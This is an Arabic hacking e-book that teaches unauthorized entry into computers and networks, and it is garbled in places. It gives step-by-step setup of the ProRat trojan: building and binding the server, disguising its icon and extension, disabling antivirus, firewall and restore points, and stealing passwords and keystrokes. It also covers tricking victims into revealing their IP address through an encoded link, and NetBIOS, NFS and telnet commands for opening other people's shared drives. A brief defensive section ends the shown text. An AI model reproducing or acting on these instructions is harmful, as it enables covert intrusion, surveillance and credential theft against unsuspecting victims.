:D١ ٢ بسم الله الرحمن الرحيم الحمد لله رب العالمين والصلاة والسلام على خاتم المرسلين سيدنا محمد وعلى آله وصحبة أجمعين . أبدأ بأسم اللة الرحمن الرحيم وهي خير بداية لهذا الكتاب الذي اعتبره كتابَا هيكليَا وليس مظمونَا لما لهذا الموضوع من قيمة لاتحصر في مجلد كامل وليس في كتاب وكأنني أغرف غرفة شٍحيحة من بحر بٍأكملة يج أمواجة ويصعب على الظمآن الوصول إلية حتى يحكم عقلة ليروي عطشة ولا اريد الآطالة في مقدمتى هذه. فهذا الكتاب يشرح طرق وأدوات "الهاكرز " في الإختراق والدخول إلى الانظمة دون تصريح له . وبما ان طرق المخترقين مرتبطة بالحماية والأمن فهذا سيفيد الجميع في حماية مواقعهم وشبكام واجهزم من الإختراق ويشرح هذا الكتاب ٤٠ % من اسلوب المخترقين المحترفين حاليا . ٣ اهداء اهداء لجميع المواقع المهتمه بعلم الحماية والإختراق والى منتدى سكيورتى فور عرب ومنتدى العاصفة ومنتدى نجم دوس ومنتدى إعصار ومنتدى العصابة وإلى جميع من شاركني في قيادة فريق هاكرز بلا حدود واهداء خاص الى أعز اصحابي M-١٦ و sNiper_hEx و Super_Linux *******_help و وإلى جميع قرائي الاعزاء واتمنى ان يحوز على رضائكم هذا الكتاب المتواضع ٤ فهرس المحتويات الغلاف...................................... ..................... ١ المقدمة.................................... ....................... ٢ اهداء........................................ .................... ٣ الفهرس...................................... .................... ٤ ماهو الاختراق وكيف يتم استغلاله................................ ٤ مصطلحات مهمة لكل مبتدئ....... ............................ ١٠ شرح برنامج البرورات .......................................... ١٤ ٢١.................................... ip كيفية استخراج رقم ال أختراق الانظمة ................................................ ٢٦ حماية جهازك من الإختراق.................................. ..... ٣٢ الفصل الثاني ................................................. ٣٦ اختراق الشبكات والتجسس عليها............................... ٣٦ التلينت .................................................. ....... ٣٩ أستغلال البروتوكولات في الاختراق .............................. ٤٢ الدوس في نظام ويندوز اكس بي .................................. ٤٥ الفصل الثالث ................................................. ٥٢ / رياضيات الاف تي بي ............................................. ٥٢ السنايفر.................................. ......................... ٥٧ مسارات ملفات المستخدمين بجميع الانظمة ......................... ٧٢ الادوات الاحترافية ................................................ ٧٤ دليل المواقع .................................................. ...... ٨٦ ٩٤/ النهاية .................................................. ........ ٨٨ ٥ ماهو الاختراق؟ الاختراق هو التسلل الى الانظمة دون شعور الاخرين بالدخول دون تصريح له . وهذا بااختصار لمعنى الاختراق ولاتعتقد ان بعض طرق الاغبياء حاليا بالمواقع تسمى اختراق واقصد بطرق الاغبياء هي نشر اختراقه والاعلان عن دخوله لهذا النظام للجميع فهذا خطأ ولايعتبر اختراق من الاساس . فأذا اردت ان تخترق فلايشعر بك احد وقت اختراقك ويجب ان لايعلم بوجودك المسؤول بالنظام الا بعد خروجك اذا اردت ان تترك له رساله . استغلال اختراقك ماهو الاختراق وكيف يتم استغلاله ((١)) ٦ يجب ان تستغل اختراقك بشئ يفيدك وليس لاثبات انك تستطيع الدخول الى النظام فقط وتكتفى ذا الغرض سواء على الاجهزه الشخصيه او الشبكات او المواقع سأقوم بتغيير كلمة مواقع الى خوادم وهذا افضل كيف تستغل اختراقك لصالحك؟ الجواب اولا انصح الجميع عدم استخدام برامج مجانيه في الاختراق ولاتقوم بااستخدام برامج مخصصه للاختراق في الاصل ويجب ان تستخدم ادوات اخرى في استخدامها لضدها واستغلالها كيف ؟ مثل ادوات السكيورتى ان تقوم باستغلالها بالاختراق لتبين لك المنافذ المفتوحه وغيره net cat & nmap & superscan مثل اداة ال من هذه الادوات اما الطريقة الثانيه والمرتبطة بجميع خطواتك وهي استغلال البروتوكولات وجمع نقاط ضعفها للدخول عن طريقها وبروتوكول النت بيوس ..وغيره FTP مثل بروتوكول الاف تي بي ٧ لاتعتقد انه مجال عادى كأي مجال آخر مثل الجرافيكس والملتميديا وغيره بما انك ستصبح خطير فأعلم انه مجال خطير وله سلبيات وإيجابيات ولكن سلبياته في بداية هذا المشوار كثيره وستواجه كثير من المصاعب في البداية اذا لم تكن لديك خبره مسبقه ذا اال بتاتّا . ولكن لاتيئس ويجب ان تضع هذه القاعده توقيعك في هذا المشوار. ١- كثره القراءة ٢- التركيز ٣- التطبيق المتكرر لامل القراءة في هذا اال حتى وأذ اعتقدت انك متمكن به . تعرف الى هذا اال قبل الدخول إليه ((٢)) ٨ يجب التركيز بكل نقطه تواجهك ومراجعة الكتب والمواضيع حول ماوصلت له كثره التطبيق هي التى ستقتل اليأس ولاتعتقد انك اذا نجحت في المرحلة الاولى ستنجح بجميع المراحل وايضا لاتعتقد انك اذا فشلت بمرحلة واحده ستفشل ذا اال ككل وهذه اهم النقاط التى يجب ان تتخذها قبل دخولك ذا اال ولاتعتقد اننى اعطى مجال الإختراق اكبر من حجمه فهذا هو الصحيح فلك مجال الجرافيكس فجميع مابه هو ان تجيد استخدام برامجه وهذا ليس تقصير في محترفين هذا اال ولكن انا أتكلم عن البداية اما مجال الملتميديا فلا يختلف عن مجال الجرافيكس ويجب ان تجيد التعامل مع برامجه مع كثره استخدامها وبعد ذالك تكون محترف اما مجال الاختراق فلك نطفة ماء من بحر يجب ان تتعلم البرمجة حتى تتعامل مع الاكواد والاكسبلويتات والسكريبتات ٩ يجب ان تجيد استخدام الانظمة حتى تستطيع التعامل مع ماتواجهه من اختراق مثال: اذا كنت من مستخدمين نظام النوافذ ويندوز وقمت بأختراق شبكه خادمها نظام ليونكس فلن تستطيع التحكم به وانت لاتجيد استخدام ليونكس ويجب ان يكون لديك خبره مسبقه ذا النظام ومع باقي الانظمة . يجب ان تكون متصفح مستمر لجميع مواقع السكيورتى والتعرف على الاخبار الجديده حول الحمايه واخر الثغرات حتى تواكب ماهو جديد ولاتكون متأخر عن العالم بطرقك يجب ان تتعامل مع برامج الحماية وتعرف ماا وماهي طبيعة عملها وان تعرف اا ستكون عدوك اللدود ذا اال من الآن فصاعدَا وهذا شرح بسيط جدا اذ لم اقول اننى لم اوفيه حقه بالشرح الكامل ال الإختراق مجال الهندسه العكسيه مجال الاحتراف الاصيل اال الخطير اال اللذي لايعرف قانون او غيره اذ لم اقول ان قانونه هو ((قانون الهاكرز لايحمي مغفلين)) اما من ناحية اخرى وهي استخدام برامج التجسس مثل الاوبتكس والبرورات مثلا فبما انك استخدم هذه البرامج اانيه فيجب ان تحذرها جيدا وانصح الجميع عدم استخدام برامج ١٠ تجسس الا بعد مايتم التأكد من صحتها و ٧٠ % من برامج التجسس هي تتجسس على صاحبها قبل ارسالها للضحايا اما من ناحية اخرى وهي تحميل البرامج من الإنترنت او حتى من المحلات التجاريه فلاتظمن ماا ويجب ان تتأكد بنفسك ولاتقول لي اننى اظمن هذا العضو بالمنتدى وجميع مواضيعه ليس ا مايسمى بتجسس فهذا لايشمل العضو نفسه ويجب ان تعتبر الموقع او العضو او المحل التجاري لايعلم ماا من ملفات تجسس ويجب ان تفحص كل ماتواجه ولاتثق باحد ثقه عمياء حتى ولو كان أنا شخصيا ١١ سنبدأ بشرح المصطلحات البدائيه لبعض برامج التجسس والإختراق فمازلنا في اول اجزاء الكتاب. هو عنوان بروتوكول الإنترنت ip خادم server عميل Client بورت = منفذ port سكان عمليه مسح وبحث scan ضغط compress إيقونه icon ضحيه victim إتصال conncet تحميل downloder مصطلحات مهمة لكل مبتدئ ((٣)) ١٢ هذا الجدول البسيط يوضح ماستواجهه في جميع برامج التجسس سنبدأ بالنقطة المهمه وهي عنوان بروتوكول الإنترنت Ip وهي اختصال الى Enternet protocol هذا هو عنوان بروتوكول الإنترنت الرقمي والذي يكون تسلسلي لكل جهاز يتصل بالإنترنت ولنضرب مثال بسيط ١٢٧,٠,٠,١ هذا هو عنوان بروتوكول الإنترنت قبل الاتصال يتكون من اربع خانات بعد مايتم الإتصال بالإنترنت يتحول الرقم التسلسلي هذا الى ارقام عدة تتغير مع كل اتصال بالإنترنت مثال ٢١٢,١٦٦,٠,١ ٢١٢ = غالبا مايحدد منطقتك وهو اول رقم في الخانه الاولى ١٦٦ = يحدد غالبا خدمة اتصالك مثلا دي اس ال او بطاقة ... ٠= لايهم ان يكون رقم صفر ولكن لضرب المثال فقط لاغير ١= لتحديد موقعك بالاتصال هذا الرقم التسلسلي يبدا من ١ وينتهى عند ٢٥٥ وبعد ذالك يرجع من ١ ويبدا بقائمه ارقام تسلسليه جديده فائدة رقم الاي بي ١٣ لن تستطيع اختراق أي نظام وانت لم تتمكن من اخراج رقم الاي بي له Port- يحتل المرتبه الثانيه بعد الاي بي عند كافه الهاكرز والمخترقين وهو مايسهل عليك الدخول للجهاز بعد معرفتك للمنفذ المفتوح بالجهاز المستهدف . Server خادم غالبا ماتواجه هذه الكلمة في برامج التجسس وهي تعنى صنع الباتش والذي هو ملف التجسس لكي تستطيع التعديل والتحرير به قبل ارساله للضحيه والخادم ليس فقط لبرامج التجسس فأذا كنت بمجال اختراق البريد والاجهزه ستستخدم هذه الكلمه وكأا ملف تجسس اما في مجال الشبكات والمواقع فالخادم هو الجهاز الرئيسي الذي يحمل جميع ملفات الشبكه او جميع ملفات المواقع وكثير ماتشاهدها بالمواقع بأسم شركات الاستضافه فهي الخادم وله معاني كثيره ولكن اختصرت لك مايفيدك بمجال الاختراق في البداية ١٤ العميل هو مايكون المنفذ الأساسي للخادم بامجال برامج التجسس ويكون هو الواجهه لتنفيذ الاوامر التى سترسل للخادم والذي هو بجهاز الضحيه مثلا ويتم تنفيذها ١٥ يعتبر برنامج البرورات هو الاشهر والافضل حاليا بعالم التجسس وسأقوم بأعطائه ٩٠ نقطه من بين بقية برامج الباكدور الاخرى بعد مرور اربع سنوات على امبراطورية برنامج السب سفن من بين البرامج الاخرى ظهر برنامج البرورات وكان بعالمه هو الجديد من نوعه والفريد يمتاز هذا البرنامج بقوته ويستخدم للشبكات والى الاجهزه الشخصيه الاخرى بفعاليه قويه جدا ويتميز بسهولة صنع باتشه بسوله واليكم الشرح بالصور على هذا البرنامج الرائع Prorat شرح برنامج ال١٦ هنا تضع رقم الاي بي هنا البورت ولاكن لاتقم بتغييره هنا للإتصال بعد مايتم وضع الاي بي الصحيح لتغيير الوان البرنامج لتنظيف الجهاز من الباتش اذا كان جهازك مصاب به ١٧ المعلومات حول جهاز الضحيه PC lnfo البرامج الموجوده بجهاز الضحيه Applications ارسل للضحيه رسائل اخطاء Message مدير النوافذ Windows دردشة مع الضحيه chat مدير بروتوكول الاف تي بي Admin FTP اللعب بجهاز الضحيه Funny stuff مدير الملفات File Manager متصفح الانترنت IExplorer البحث عن ملفات بالجهاز Search Files لوحة التحكم الخاصه بجهاز الضحيه Control Panel الرجستري محرر التسجيل Registry إيقاف تشغيل جهاز الضحيه Shut Down PC تصوير سطح المكتب لجهاز الضحيه Screen Shot الكليب بورد Clipboard كي لوقر جاسوس لوحة لمفاتيح KeyLogger ١٨ يئة الاقراص وعمل فورمات Give Damage كلمات المرور الخاصه بالضحيه Passwords لتحميل والتشغيل بجهاز الضحيه R. Downloder تشغيل Run الطابعة وفائدها لطباعة بجهاز الضحيه اذا Printer كانت تعمل .......... الخدمات servecs أعداد الخادم Online Editor ProConncetive صنع الخادم وهنا توجد اعدادات الباتش Create اللغة English الخيار الاول لصنع سيرفر الخيار الثاني لصنع سيرفر تحميل الخيار الثالث لصنع سي جي أي بقائمه الضحايا - - - - - - - - - - - - لنفرض إننا قمنا بالضغط على اول خيار وهو لصنع سيرفر سيظهر لك قائمه ذا الكثير من الخانات وإليك الشرح بالصور ١٩ هذا كنت في شبكه محليه وتريد ان يتم ارسال التبليغ عبر رقم الاي بي لجهازك فضع اشاره صح وقم بوضع رقم أي بي الشبكه . واذا كنت تستخدم جهاز مستقل فلاداعى لوضع اشاره واترك هذه الخانه وتابع معى بقيه شرح الخانات هذا الخانه لتنبيه عبر البريد قم بوضع اشاره صح وضع عنوان بريدك الإلكتروني الذي تريد ان يصلك معلومات حول جهاز الضحيه عن طريقه وهذا مهم جدا لمن اراد استخراج عنوان الاي بي عن طريق البرنامج هذا لتنبيه عبر الآسكيو ولكن لام هذه النقطه اذا قمت بوضع اشاره صح على خانه التبليغ عبر البريد . اذا قمت بوضع اشاره صح فستضطر لوضع تنبيه عبر السي جي آي ضع في خانه اللينك رابط موقعك وافضل ان تستخدم لوق السي جي آي لاستخراج الاي بي بعد التبليغ - - - - - - - - - - هنا منفذ السيرفر كلمه المرور للسيرفر اسم الضحيه هنا لظهور رسالة خطا عند تشغيل لكتابة الرسالة Configure الخادم قم بالضغط على هذا الخيار لحذف السيرفر من جهاز الضحيه بعد تشغيله ٢٠ هذا الخيار لإغلاق برامج مكافحة الفايروسات والجدار الناري لإغلاق مركز الحمايه بويندوز اكس بي سيرفس باك تو أغلاق الجدار الناري لويندوز اكس بي إلغاء نقاط الاستعادة لويندوز اكس بي - -- -- -- -- -- ضع اشاره صح واختر الملف الذي تريد ان يندمج معه الباتش - -- -- - -- -- -- هنا لتغيير امتداد الباتش اما الخيارين التى باللون الاحمر هي بأيقونه اما بقيه الخيارات فستكون بدون ايقونه - -- -- -- -- -- ٢١ لإختيار إيقونه للباتش <-- - لصنع الباتش ....... وتم بحمد لله الانتهاء من شرح البرنامج بالتفصيل وهذا هو موقع البرنامج الرئيسي ProRat.Net Software [index] ٢٢ البرامج التى يجب تتوفر بجهازك العزيز ١- جدار ناري ؟؟؟ Urlencode -٢ ☺ ويكفي هذا الجدار الناري الذي هو فايروول بمكانك استخدام البي سي كلين او الزون الارام اما الوريلنكود فهذا هو رابطه http://www.geocities.com/naomy_cambel /urlencode.zip والان تابع معى بكل وضوح رجاء الان اسحب رقم الاي بي تبع جهازك انت وليس جهاز الضحية وطريقة اظهار رقم الاي بي تبع جهازك هو عن طريق الدوس ادخل الى نافذه الدوس واكتب ايبيكونفق ipconfig بعد مايظهر لك رقم الاي بي تبعك انسخه واذهب الى برنامج الوريلنكود كما موضح بالصورة للضحيه ip كيفية استخراج رقم ال٢٣ ١- في الخيار الاول ضع الاي بي تبعك ٣- اضغط على انكود ٢- انظر لقد شفر لنا رقم الاي بي تبعنا بعد ماقمنا بتشفير رقم الاي بي تبع جهازنا سنضعه بعد /http://١٢٧,٠,٠,١ وبأمكانك حتى دمجه مع أي موقع اذا اردت ولكن هذه طريقة فعاله %١٠٠ اما لمن اراد دمجه مع موقع يكتبه هكذا هذا هو رقم الاي بي مشفر E٪٣٠٪٢E٪٣٠٪٢E٪٣١٢%٣٧%٣٢%٣١% وسندمجه مع موقع مايكروسوفت مثلا ٢٤ ٢%٣٧%٣٢%٣١%http://google// E٪٣٠٪٢E٪٣٠٪٢E٪٣١ والآن قدمة لضحية على طبق من ذهب بعد مايضغط الضحية على الينك والذي هو الرابط الموجود سيتوجه الى عنوان الاي بي تبعك وسيعطيه صفحه غير صالحة الان سيبدا مفعول الجدار الناري الفايروول بعد مايضغط الضحيه على الاي بي تبع جهازك سيطلق صافرات انذار برنامج الفايروول ويقول لك جهااز يريد الاتصال بك هل تسمح له بالدخول كالعادة ☺ وسيظهر رقم جهازه لك الان انسخ رقم جهازه والذي هو الاي بي من برنامج الجدار الناري ونقول لك بالهناء والشفاء حصلت على عنوان جهازه بكل سهوله وبدون ان يشك وبدون حتى ان تسبب لنفسك عوائق خوفا لللاي بي تبع جهازك فهو مشفر حتى لو كان الضحية مخترق لايستطيع فك تشفير رقم جهازك حتى يدخل عليه ٢٥ ** الطريقة الثانية** هذه الطريقة قديمة ومشهوره ولكن حبيت اننى اقوم بأضافتها بكتابي هذا حتى يكون الموضوع كامل والكامل وجه سبحانه تعالى اذا كان الضحية في شاتينق((دردشة)) او بماسنجر((رسول)) او بمكان يسمح لك ارسال واستقبال الملفات للاصدقاء فااتبع معى هذه الطريقة ولكن قبل ان ابدا بالشرح سأوضح لك شئ مهم من عادة سوبر كريستال ان يضع شرح كامل بدون استفسارات واسأله حول مواضيعه واول سؤال وجوابه معه هو هل انت بشبكة؟ نعم لا اذا كنت بشبكة فسأقول لك الطريقة لن تفلح معك اما اذا كنت بجهازك فتابع معى الدرس بكل وضوح ارسل للضحية ملف او محادثة صوتيه..... الخ بعد ذالك توجه لدوس بسرعة واكتب نت ستات ٢٦ netstat سيستخرج لك الدوس عناوين بروتوكولات كثيره الصورة تشرح لك هنا Address Local-١ هنا ارقام الاي بي تبع جهازك وبرامجك Address Foreign-٢ هنا ارقام الاي بي المواقع والبرامج التى زرا او حملتها ومنها رقم الاي بي تبع الضحيه وسيكون آخر رقم ٢٧ ساشرح كيفية اختراق نظام النوافذ ويندوز ونظام المصدر المفتوح لينوكس نبدا على بركة للة سنركز على نقاط ضعف البروتوكولات وليس نقاط ضعف البورتات فنقطة الضعف تبدأ من الخدمة وليس من منفذ الخدمة هذا اقرب تعبير لها إختراق الانظمة بدون برامج ٢٨ البروتوكولات التى سنتكلم عنها بسلسلة دروسنا هي كالتالي -- - - - -- - - - -- - - - -=NetBios= -- - - - -- - - - - - - - - هذا البروتوكول يسمح بالمشاركة بالملفات بنظام ويندوز النوافذ و ال (( TCPIP)) ويستخدم بروتكول التي سي بي إي بي ((NetBEUI)) اما البورتات التى يستخدمها هي ، ١٣٧،١٣٨،١٣٩ الآن قم بعمل((سكان)) مسح لهذه البورتات سيظهر لك كم هائل جدا من عناوين بروتوكولات الانترنت ((الاي بي)) للاجهزه التى مفتوح ا هذه البورتات اختر احد هذا الاجهزه وقم بالتطبيق عليه قم بكتابة هذا الامر في نافذة الدوس nbtstat -A ويكتب هكذا ٢٩ nbtstat –A١٢٧,٠,٠,١ ١٢٧,٠,٠,١ =عنوان الاي بي المستهدف طبعا سيظهر لك لسته كامله فلقد وقع ((SHARING)) اذا كان الجهاز المستهدف وضعه هو في قبضت يدك وهي تعنى انه يسمح بالمشاركة ... NOT )) اما اذا كان مفتح شوبه وفاهم الى يدور بيكون وضعه هو وهذا مغلق المشاركه ولن تستطيع الدخول على ((SHARING نظامة ياعزيزي الان قم بكتابة هذا الامر بدوس مع مراعاة عنوان الاي بي تبع الجهاز المستهدف net view \\127.0.0.1 والآن اذا كان الضحية لم يضع كلمة مرور فسيسهل علينا تشريف نظامه والدخول عليه بدون أذنه وللدخول الى جهازه كما تعلمنا سابقا في اختراق الشبكات والدخول الى الاجهزه اذهب الى ابدأ (ستارت)) وبعد ذالك تشغيل ٣٠ وضع الاي بي هكذا \\١٢٧,٠,٠,١ ستظهر لك ملفات الضحية ويوجد طريقة اخرى عن طريق الدوس تسمح بالدخول الى قرص معين مثلا نريد الدخول الى قرص السي نكتب الامر هكذا net use c: \١٢٧,٠,٠,١C واذا اردنا الدخول الى قرص الدي نكتب هكذا net use d: \١٢٧,٠,٠,١D و قرص الاي net use e: \١٢٧,٠,٠,١E ☺ ونفس الطريقة مع بقية الاقراص ٣١ وهكذا استغلينا بروتوكول النت بيوس للدخول للانظمة في نظام لينوكس توجد خدمة مشاركة الملفات وقريبة من النت بيوس واحببت ان اذكر بدايتها هنا Network System وهي اختصار الى NFS خدمة ال File هذا الخدمه تستخدم بروتوكول التى سي بي وتسمح بمشارك الملفات بنظام ليونكس وللاختراق عن طريقها ****l ادخل الى الترمينل وبعد ذالك قم بكتابة الامر: showmount -e127.0.0.1 سيستخرج لك جميع الملفات المسموح ا المشاركه ٣٢ طبعا هذا اذ لم يكن النظام المستهدف مفعل تصريح الوضع هكذا Read-only فهذا يعنى اننا لانستطيع الدخول الى النظام اما اذا كان التصريح هو Write فهذا يعنى انك تستطيع الدخول الى النظام ٣٣ لايوجد شئ اسمه حمايه ١٠٠ % ولا حتى بنسبة ٩٠ % ولاتعتمد على برامج الحمايه في حماية جهازك فالحمايه تقف عند تصفحك للانترنت بالشكل الصحيح وانصحك عن الابتعاد عن تحميل البرامج اانيه من الإنترنت فأغلبها به فايروسات وملفات تجسس وحتى وان لم يكن يخص هذا اال . واذا كنت ممن لايستخدم الجهاز الا بوجود برامج حمايه فاانصحك بالابتعاد عن برامج الحمايه المشهوره مثل المكافي والانتى فايرس فهي غبيه جدا استخدم البرامج الغير مشهوره وانصح بالبرامج الروسيه بالمرتبه الاولى حماية جهازك من الإختراق ٣٤ حمل برامج السبايوير مثل برنامج BPS Spyware & Adware Remover وهذه صورة للبرنامج وانا بنفسي استخدمه فهذه خلفيه ليس ☺ لاتعتقد ان صورة برتنى سبيرز في نفس البرنامج للبرنامج علاقه ا والطريقة الثانيه لاكمال حمايه جهازك بالشكل الصحيح ٣٥ DeepFreeze استخدم برنامج ال اعلم انه برنامج مزعج بعض الوقت للإجهزه الشخصيه ولكن فائده فقط في شئ واحد وهو اذا قمت بتصفح موقع او تحميل برنامج به ملف تجسس ولصق بجهازك فبمجرد عمل اعادة تشغيل للجهاز سيتم حذفه لان وظيفه هذا البرنامج حذف جميع مايضاف للجهاز بعد مايتم تثبيت البرنامج وانصحك اذا اردت تحميله ان تحذف ملفات الكويكز وتثبت ماتريد من ☺ برامج قبل تثبيته فبعد التثبيت لن تستطيع تثبيت أي ملف بالجهاز وهذا هو حمايه جهازك جزء بسيط جدا وسأبتعد عن الطرق القديمه واغلاق البورتات ........الخ من طرق لاتفيدك ابدا وهذا اسهل وافضل الطرق لحماية جهازك ٣٦ الفصل الثاني ٢ ٣٧ اعترف لك ان مجال الشبكات والخوادم ليس بالسهل وكما اختراق الاجهزه وغيره ليس اختراق الشبكات والخوادم هو انك تخترق احد الاجهزه وتكتفى ذا الغرض .....لاوالف لا يجب ان تخترق الجهاز الرئيسي وتتعامل معه بكل حذر حتى تستطيع ان تسيطر على جميع الاجهزه وتختلف شبكه عن شبكه وخادم عن خادم ليس بقوه حمايتها ولكن بالشخص الذي قام بربط الشبكه فمهندس الشبكات المحترف اعتقد انه سيربط الشبكه بأحكام واقفال كل ماتذكره سابقا من طرق اختراق ويجب ان تتعامل مع الشبكه بكل احتراف وكل تركيز اما المهندس الغبي سيسهل عليك الإختراق واغبي شئ لاحظته انا بنفسي ان ٦٠ % من المقاهى تسمح بالمشاركه؟؟؟؟؟ وهذا قمه غباء طبعا واسهل عمليه تقوم بالسيطره على الخادم الرئيسي هذا الجزء سيكون مرتبط بالاجزاء التاليه لنفرض مثلا انك موجود بنفس الشبكة التى تريد ان تخترقها اختراق الشبكات والتجسس عليها ٣٨ فما هي اول طريقة تفعلها ؟ قم بالذهاب الى موجة الاوامر دوس وقم بكتابة هذا الامر Ipconfig سيستخرج لك هذا الامر قائمه بارقام بروتوكولات الشبكه ومنها البروتوكول الاساسي لنفس الشبكة ضعه بالنوتباد((المفكره)) واكمل معى الموضوع الان اكتب امر Net view في نفس موجة الاوامر لنتعرف على اسماء الاجهزه ** ملاحظة مهمة انا اتكلم عن شبكات ا سيرفر رئيسي فأذا كنت تستخدم شبكات اقل من الدرجه المتوسطه والتى اجهزا مرتبطه بدون خادم فلن يظهر لك اسماء للاجهزه ** بعد ماقمت بكتابة الامر سيظهر لك جميع اسماء الاجهزه بالترتيب وعادة مايكون الاسم الاول هو للجهاز الرئيسي اختر احد هذه الاجهزة واحفظ اسمها وليكون الاسم الذي ظهر لك من بين الاجهزه هو ٣٩ CRystaL اذهب لاابدا ومن ثم تشغيل واكتب الاسم هكذا \\CRystaL الان ادخل وسترى ملفات الجهاز بين يديك هذا اذا كان يسمح بالمشاركه وبأمكانك ايضَا تصفح الجهاز عن طريق الدوس ولكن اخترت لك الشاشه الرسوميه للابتعاد عن الاوامر وعدم الفهم ..... واذا كان الجهاز يحمل كلمة مرور او حتى لايسمح بالمشاركة؟ في هذه اللحظه اكمل معى بقيه الدروس والتوسع بالاختراق الحقيقي حتى تستفيد ولكن سأوضح شئ مهم اننى سأقوم بتطبيق بيقه الدروس على ويب سيرفر حتى تستفيد من جميع النواحي سواء اختراق شبكة او خادم مواق ٤٠ التلينت في الإختراق التلينت برنامج صغير عظيم لعمل شيء ين مثيرين. في الحقيقة اذا اردت دعوة نفسك مخترق انت بالتأكيد يجب ان تكون قادرَا على استخدام التلينت سيكون مسار التلينت هو me، اذا كنت تستخدم مشتقات ويندوز ٩٥،٩٨ c:\windows directory سيكون مسار التلينت XP،٢٠٠٠، NT اما مشتقات ال c:\winnt\system32 directory ليس في الانترنت مساعدة لهذا البرنامج فأحببت اننى ازود بعض المعلومات للمستخدمين الجدد وأعتبر التلينت ايضَا اهم نقطه بسلسلتنا هذه فهو البوابة الرئيسية لك بجميع المراحل وسأذكر البروتوكولات ومنافذها كي تستطيع الاتصال ا عن طريق التلينت TELNET التلينت ٤١ ..........الخدمة............ ...........منفذها........ ٢١ FTP ٢٣ SSH ٢٥ SMTP ٨٠ http ١١٠ Pop٣ ٢٢ telnet ٤٤٣ https ٧٩ finger .......port........ ........servcs...... بأمكانك ايضَا استرجاع صفحات الويب عن طريق التلينت وهي بخدمه . الاتش تي تي بي والتى عادة يكون منفذها هو ٨٠ يوجد ايضاء خوادم ويب تستخدم منفذ ٨٠٨٠ ولكن الاغلبية والشائعة بين مواقع الإنترنت هو خادمات الويب التى تستخدم منفذ ٨٠ اما للدخول الى موجة التلينت اذهب إلى start - -- - - - -> ابدا run- - -- - --> تشغيل قم بكتابة تلينت في مربع الحوار telnet ٤٢ ستفتح لك موجة التلينت وستكون هكذا c:\>telnet <host> <port> اسم الجهاز او الموقع او الخادم المستهدف =host المنفذ المفتوح =port telnet c:\telnet>open c:\telnet>to ١٢٧,٠,٠,١ o ب open اذا كنت من مستخدمين ويندوز اكس بي استبدل to بعد ذالك تكتب رقم الاي بي والبورت المفتوح بعد واضغط انتر للاتصال بالجهاز تأكد انه لن يقوم بالاتصال بالجهاز الاخرى في حالة عدم توافق البورت او حتى ان البورت مغلق افضل في هذه الحالة انك تستخدم برنامج السوبر سكان حتى تحصل على البورت المفتوح لينجح معك الاختراق او تقوم بكتابة البورتات المشهوره ☺ هذه الايام بسبب الفايروسات ٤٣ كما تكلمت قبل ان جميع دروس كتابي مرتبطه ببعضها البعض فهذا الجزء مرتبط بدرس اختراق الانظمة........ شرح تفصيلي مباشر لبروتوكول النت بيوس تكلمنا في جزء اختراق الانظمة عن كيفية الاختراق عن طريق بروتوكول النت بيوس ولكن لم نذكر اوامر النت بيوس او حتى مابعد الاختراق ولحرصي على الاستفادة بشكل واسع كي لاتقع بمشاكل لقله خبرتك ذا اال سأقوم بالشرح التصويري المباشر عن مابعد الاختراق باستغلال بروتوكول النت بيوس استغلال البروتوكولات في الاختراق ٤٤ بأمكانك بعد الاتصال بالجهاز الاخر عن طريق النت بيوس ان تشترك بالطابعة والحافظات ايضا Net use x \\١٢٧,٠,٠,١\crystal رسالة الدافع x حيث ان و ١٢٧,٠,٠,١ رقم الاي بي للجهاز المستهدف الحافظة crystal و فإذا اردت ان تفتح الحافظة نكتب الامر التالي Net use i \\١٢٧,٠,٠,١\crystal واذا تلقيت رسالة اعلام فانت استطعت الدخول الى هذه الحافظة ولكن ماذا اذا كانت بكلمة مرور ؟؟ في هذه الحالة سنقوم باستغلال السوبريوزر في نظام الويندوز ☺ كم هو مفضل لدي من روت بليونكس ٤٥ قم بطباعة هذا الامر لتخطى كلمة المرور Net use i \\host\ super-crystal/user:A administrator رقم الاي بي طبعا =Host nbstat ويوجد طريقة اخرى بقيادة قم بطباعة هذه الامر Nbstat –A ١٢٧,٠,٠,١ هذا فقط في حالة واحدة اذا كان البورت ١٣٧ و ١٣٩ مفتوح بالجهاز ☺ المستهدف فسترى معلومات هائله بعد مايتم طبع الامر اذا نجح معك الطريقة وكان البورت مفتوح فأعلم انك سيطرت على الجهاز سيطرة كاملة وافضل لك من الاختراق ببرامج التجسس اانيه ب ١٠٠ مره وتأكد انك تشترك بجميع ملفات جهاز الضحيه !!! ولكن الملفات مخفيه؟؟؟؟؟؟ في هذه الحالة طبق اوامر كريستال الاحترافيه Net use e \\host\c$password/user:username ٤٦ جميعنا يعرف مدى اهمية دوس في نظام ويندوز ولكن اختلف الامر في نظام ويندوز اكس بي وظهر دوس بشكل افضل و ٩٨ و ٩٥ Me في الانظمة السابقة من ويندوز ٢٠٠٠ و command الدوس هو افضل بكثير منه في الانظمة السابقه cmd.exe اما في ويندوز اكس بي بما يتميز من سهولته واختصاراته واتاحته لااوامر عدة إليكم الشرح التفصيلي لدوس اكثر الدوس في نظام ويندوز اكس بي ٤٧ **دوس بوابة ويندوزك الاولى لعالم الإنترنت** يجب ان تتعلم جميع اوامر دوس وبروتوكولاا كي تستطيع تطبيقها في اوقاا بشكل افضل سنتكلم عن الدوس بشكل مبسط ومسهل للجميع ونبتعد عن كثره الفلسفة NETBIOS TCP/IP NBTSTAT TELNET NET VIEW FTP NET USE PING NET LOCALGROUP NETSTAT TRACERT NSLOOKUP تقريبا الجدول سهل الكثير على القارئ والان سنتكلم عن نظام السيطرة على الارسال TCP/IP وهذا هو بروتكول حزم UDP هذا غالبا مايكون مرتبط ببروتوكول ال البيانات ٤٨ فانت بأمكانك ان تحول هذه الاوامر ضد حاسباا الاخرى تستخدم اكثر الشبكات المحلية نظام السيطره على الارسال TCP\IP NET BIOS Net Basic Input/Output System هي اختصار ال طريق اخر للاتصال بالحاسبات الاخرى هذه في اغلب الاحيان يستخدم في نظام ويندوز و ليونكس ويونيكس انت مممكن ان تستخدم اوامر النت بيوس في الانترنت بربط مع نظام السيطره على الارسال ولكن في اغلب الاحيان تكون اوامر النت بيوس مغلقه ببرامج حماية وأيضَا ليس العديد من الحاسبات تستخدم النت بيوس ولكن هذا لايمنعنى من شرح الاختراق عن طريق النت بيوس ٤٩ اذن ماهو رأيك لو قمت بفتح موجة الاوامر دوس وكتابة هذا الامر مع اختيار الموقع الذي تريد ان تستخرج عنه معلومات او حتى البريد الذي تريد عنه معلومات أليكم الشرح في ليونكس whois وطبعا هذا يعادل اداة ال C:\>nslookup Default Server: DNS.saudi.net Address: 